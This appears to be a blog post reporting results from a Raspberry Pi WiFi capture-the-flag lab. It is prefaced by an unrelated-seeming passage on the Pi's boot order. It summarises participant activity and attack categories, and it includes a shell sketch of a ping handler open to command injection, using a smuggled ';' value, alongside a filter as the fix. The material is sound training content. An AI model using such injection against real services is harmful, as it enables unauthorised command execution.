The firmware embedded on the motherboard runs on the CPU at power-on. The CPU loads the bootloader. The bootloader, ideally, performs its cryptographic checks correctly and loads an unmodified kernel. From there, the boot process continues with init/systemd, and our services are brought online for a running system.

The Pi is totally different. Instead of starting with the CPU, we start with the GPU.

Raspberry Pi Boot:

┌─────────────┐
│  VideoCore  │ ← GPU boots FIRST
│    (GPU)    │
└──────┬──────┘
       ↓
┌─────────────┐
│ Loads ARM   │
│   kernel    │
└──────┬──────┘
       ↓
┌─────────────┐
│  ARM CPU    │ ← CPU starts LAST
│   wakes up  │
└─────────────┘

Why? The Raspberry Pi uses Broadcom BCM2xxx chips, where the “main” processor is a VideoCore IV/VI GPU that is activated at power-on. It runs proprietary firmware that handles the boot. The BCM2xxx chips are typically used in set-top boxes for video streaming and entertainment, where the goal is to get to a flashy user interface quickly. The Raspberry Pi Foundation chose these inexpensive chips as their base, which left them with an odd boot order.

Raspberry Pi WiFi CTF Lab Experiment Results

This past Saturday, I hosted a WiFi CTF at Big Block Brewery in Carnation, WA. This was my first experiment where I could gather information about how other folks perceive my CTF. A big challenge for me is discovering what’s discoverable to participants. Running this lab would help me learn if this project is viable. The big questions are:

  1. Will the lab work? Are the vulnerabilities and scoring system reliable?
  2. Will participants be able to figure out the IP addressing of the WiFi network and discover targets for exploitation?
  3. What kind of after-action reporting can I generate?

Did the lab work?

Yes! I arrived at about 12:20pm and had the lab up and running by about 12:55. I had a small bobble: when I arrived, it looked like I may have brought the wrong Pi for the CTF. The hostname on the access point had reverted to “ansibledest.local” and it only had 8 commands in its history. But it turned out there was just a hostname bug in the latest build. The LED animations fired up when I powered on, which meant it had to have my Vulnerable AP code on it.

6 people signed up for the lab in advance of the event. 5 showed up, and 2 additional pub patrons ended up joining. I left the lab up until roughly 5pm. Here are some basic statistics from the CTF admin UI:

Were participants able to figure out the IP addressing?

This was a little unclear to me.

The group was able to score, so they obviously found and exploited things, but I did talk folks through the idea of a “default gateway” and how to look on their devices to figure out their own system’s IP and the target system’s. Did I taint the data? I’m not sure. I suspect a couple of folks port scanned and targeted their own laptops during a network scan. I’m concerned that my presence may have been necessary to give folks a pointer on what to explore.
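The walkthrough I gave participants boils down to a couple of commands. A hedged sketch: the route line below is hardcoded for illustration (on a real client it comes from `ip route show default`), and the final sweep assumes nmap is installed:

```shell
# Illustrative: on a participant laptop this line comes from `ip route show default`
route_line="default via 192.168.8.1 dev wlan0"
gateway=$(echo "$route_line" | awk '{print $3}')
echo "Default gateway (likely the AP): $gateway"

# The AP is the obvious first target; sweep its /24 for other live hosts
subnet=$(echo "$gateway" | awk -F. '{printf "%s.%s.%s.0/24", $1, $2, $3}')
echo "Scan range: $subnet"
# nmap -sn "$subnet"   # ping sweep to discover targets (nmap assumed installed)
```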

What kind of after-action reporting can I generate?

I pulled logs off the vulnerable access point and did some rough analysis. Logs included the raw webserver logs as well as the database I use to track scoring & exploit attempts.

Over the course of the event, there were 7 participants with 466 exploit attempts and 28 solves. 10 out of the 23 challenges were solved by the participants. One participant, Sl0hth2, successfully achieved remote root on the access point. Sl0hth2 was also the first to score in several CTF challenges, which gave him scoring bonuses. A general question would be: how many clients did we see attach and reattach? Here are some DHCP metrics:

DHCP Lease attempts

204 of 280 DHCP entries (73%) are from a test device that periodically attached and detached from the network, which gave participants an opportunity to sniff and crack a 4-way handshake. The participants’ DHCP traffic accounted for only ~76 events.

Scoring Milestones

I ran a report of the first-blood modifier bonuses, which gives a feel for who got the most “first strike” points as well as an intuition into which classes of challenges people scored on.

First Blood Scoring Modifications

Now we’re ready to look into what the attack traffic was during the event. The largest volume of attack traffic was SQL injection. There is a login page and a user database query page that can be targeted for exploitation. I’ve put some effort into designing the database to be resilient to data-destruction attacks, so its utility for “gaining root” on the device is limited. For many people, SQL injection is the ‘hello world’ of security exploitation, so I have some challenges that can be used for scoring.

SQL Injection Attacks

Next was command injection. The solution has a web page that vends access to the ping utility. Command injection can be used to run arbitrary commands on the device, and it presents an entry point for enumerating the host system’s configuration and getting some remote command access.
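The vulnerability class (not the actual CTF code, which I’m keeping vague on purpose) looks like this: user input spliced into a shell command unescaped, so a trailing `;` smuggles in a second command.

```shell
# Hypothetical vulnerable handler: the "host" field goes into the command raw
user_input="127.0.0.1; echo INJECTED"
sh -c "ping -c 1 $user_input" 2>/dev/null   # the echo after ';' runs too

# The fix is to reject shell metacharacters (or avoid the shell entirely):
case "$user_input" in
  *";"*|*"|"*|*"&"*) echo "rejected: invalid host" ;;
  *) ping -c 1 "$user_input" ;;
esac
```

Even if ping itself fails, the injected command after the `;` still executes, which is exactly what makes this an enumeration foothold.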

The next most popular attack was XSS. Again, low utility for remote compromise, but a good way to grab some points.

XSS Attacks

Next we have some file-based attacks. Here we’re starting to see evidence that participants were able to modify the file system and get it to execute attacker-controlled/created code:

File-based attacks

Finally we have some information disclosure attacks. We get evidence that participants were able to navigate to and interrogate some high value exploitation assets on the system:

So in summary, we had 154 attack attempts. Most of the focus was on Command Injection, SQL injection & XSS. Given the scoring distribution, it’s not surprising how few folks

Information Disclosure attacks

Next Steps

I’ll be sending a note out to the participants giving folks their own scoring data if I have it.

I have a few bugs logged at https://github.com/CaptainMcCrank/wifi-ctf-bugs that I’ll work through.

I had a few more feature ideas. The web app needs to present signals of successful exploitation to the participants. I’ve also put more effort into the LED animations, which draw walk-ons but get little inspection from participants.

There are also some documentation edits that need to be made.

I hope to have a new build ready for some testing by the end of this week. I’m looking for another location to run a beta test. If you want to partner, please reach out. You can connect with me on LinkedIn: https://www.linkedin.com/in/patrickmccanna/